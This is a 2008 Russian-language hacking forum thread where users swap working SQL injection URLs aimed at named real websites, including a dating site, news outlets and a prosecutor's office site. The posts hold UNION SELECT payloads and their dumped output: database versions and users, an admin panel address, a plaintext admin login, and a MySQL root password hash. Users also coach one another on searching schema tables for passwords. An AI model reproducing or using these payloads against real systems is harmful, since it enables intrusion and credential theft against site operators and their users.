27.12.2008, 12:56
|
|
Познающий
Регистрация: 13.01.2007
Сообщений: 96
С нами:
10171592
Репутация:
50
|
|
SQL-INJ:
Код:
http://www.devochki.com/members/profile.php?pid=-327
Код:
http://www.devochki.com/members/profile.php?pid=-327+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39--
Код:
Version - 5.0.67-community-log
User - devochki_dating@localhost
Database - devochki_dating
Код:
http://www.devochki.com//members/profile.php?pid=-327+union+select+1,concat(fusername,0x3a,fpassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+atadmin--
Админка
Код:
http://www.devochki.com/admin/
krasi0:123
|
|
|
27.12.2008, 14:57
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
не прет сегодня на скули..
Код:
http://www.heimlichinstitute.org/page.php?id=-4+union+select+1,2,3,4/*
пр: 5 |
|
|
|
27.12.2008, 21:50
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами:
9270510
Репутация:
519
|
|
Сообщение от faza02
не прет сегодня на скули..
Код:
http://www.heimlichinstitute.org/page.php?id=-4+union+select+1,2,3,4/*
пр: 5
Код:
http://www.heimlichinstitute.org/page.php?id=-4+union+select+1,convert(concat(table_schema,0x3a,table_name,0x3a,column_name) using latin1),3,4+from+information_schema.columns+limit+1,1--
Там менще 30таблиц и больше 100 колонок...
|
|
|
|
27.12.2008, 15:51
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
С нами:
9644530
Репутация:
443
|
|
Это верно..
http://www.yesoudo.com/channel_detail.php?chid=-15+union+select+1,concat_ws(0x3a3a,version(),user( ),database()),3,4,5,6,7,8,9--
http://www.yesoudo.com/channel_detail.php?chid=-15+union+select+1,concat_ws(0x3a3a,user,password), 3,4,5,6,7,8,9+from+mysql.user--
root::*29D1EAE62F6F4F8D245F4F03DC8D4B6FD99516C4
version:5.0.21-log
user:root@localhost
database:yesoudo
Татуировочки..
http://tatty.ru/galary/index.php?id=-41+union+select+1,concat_ws(0x3a3a,version(),user( ),database()),3,4,5,6,7,8,9,10,11,12,13/*
version:4.1.22
user:tropico_mysql@10.1.10.215
database:tropico_db
|
|
|
|
27.12.2008, 20:06
|
|
Новичок
Регистрация: 22.12.2008
Сообщений: 16
С нами:
9149515
Репутация:
7
|
|
Чтото я не вьеду а где пароли:
http://www.artmos.ru/art.php?st=-4+union+select+1,table_name,3+from+information_sch ema.tables--
|
|
|
|
27.12.2008, 21:20
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами:
9270510
Репутация:
519
|
|
Сообщение от vladvk
Чтото я не вьеду а где пароли:
http://www.artmos.ru/art.php?st=-4+union+select+1,table_name,3+from+information_sch ema.tables--
Здесь 3 бд:
Выведим из всех бд название таблиц и колонок:
Код:
http://www.artmos.ru/art.php?st=-4+union+select+1,concat(table_schema,0x3a,table_name,0x3a,column_name),3+from+information_schema.columns--
Ну а далюше уже сам их перебирай, мож чет и найдешь... 
Последний раз редактировалось -m0rgan-; 27.12.2008 в 21:30..
|
|
|
|
27.12.2008, 20:21
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Чтото я не вьеду а где пароли:
http://www.artmos.ru/art.php?st=-4+union+select+1,table_name,3+from+information_sch ema.tables--
Это ты вывел все таблицы, которые есть в базе сайта, но не пароли!
|
|
|
|
27.12.2008, 21:06
|
|
Новичок
Регистрация: 22.12.2008
Сообщений: 16
С нами:
9149515
Репутация:
7
|
|
Сообщение от mailbrush
Это ты вывел все таблицы, которые есть в базе сайта, но не пароли!
Да я знаю что таблици и колонки выводил но в какой таблици могут быть пороли ума не прилажу
|
|
|
|
27.12.2008, 21:15
|
|
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
С нами:
9463474
Репутация:
155
|
|
Сообщение от mailbrush
Это ты вывел все таблицы, которые есть в базе сайта, но не пароли!
нет,не все..а только первую..а всё выводятся так:
http://www.artmos.ru/art.php?st=-4+union+select+1,unhex(hex(group_concat(table_name ))),3+from+information_schema.tables--
пассов тут и не должно быть по мойму..сайт ваще чо-то стрёмный..
File_priv - N
админки думаю нет..табл никаких норм нет..
p.s. учите русский язык и пишите норм.
|
|
|
|
27.12.2008, 20:43
|
|
Познающий
Регистрация: 18.04.2008
Сообщений: 62
С нами:
9507243
Репутация:
37
|
|
Поиском ничего из этого не нашел, так что извиняете, если уже было..
trud.ru - интернет-издание 
http://www.trud.ru/issue/news.php?id=-1+union+select+1,2,concat_ws(0x3a3a,version(),user (),database()),4,5,6,7,8--
Version - 4.1.21-log
User - trudinfo@localhost
Database - trudinfo_db
Google PR: 8
Yandex тИЦ: 6900
Alexa.com: 3429
apa.az - азербайджанский новостной сайт
http://ru.apa.az/news.php?id=-1+union+select+1,2,concat_ws(0x3a3a,version(),user (),database()),4,5,6,7,8,9,10,11,12,13,14,15,16--
Version 5.0.67-community
User apaadm_user@localhost
Database apaadm_ru
Google PR: 6
www.remsoft.com - "программное обеспечение для промышленности"
http://www.remsoft.com/news.php?id=-1+union+select+1,2,3,concat_ws(0x3a3a,version(),us er(),database()),5--
Version 4.1.22-community-nt-log
User remsoft@WSH-004
Database remsoft
Google PR: 5
www.chuvprok.gov.ru - сайт Прокуратуры Чувашской области 
http://www.chuvprok.gov.ru/news.php?id=-1+union+select+1,concat_ws(0x3a3a,version(),user() ,database()),3,4,5--
Version 4.0.17-nt
User prokuratura@localhost
Database prokuratura
Последний раз редактировалось Thrasher88; 27.12.2008 в 21:28..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
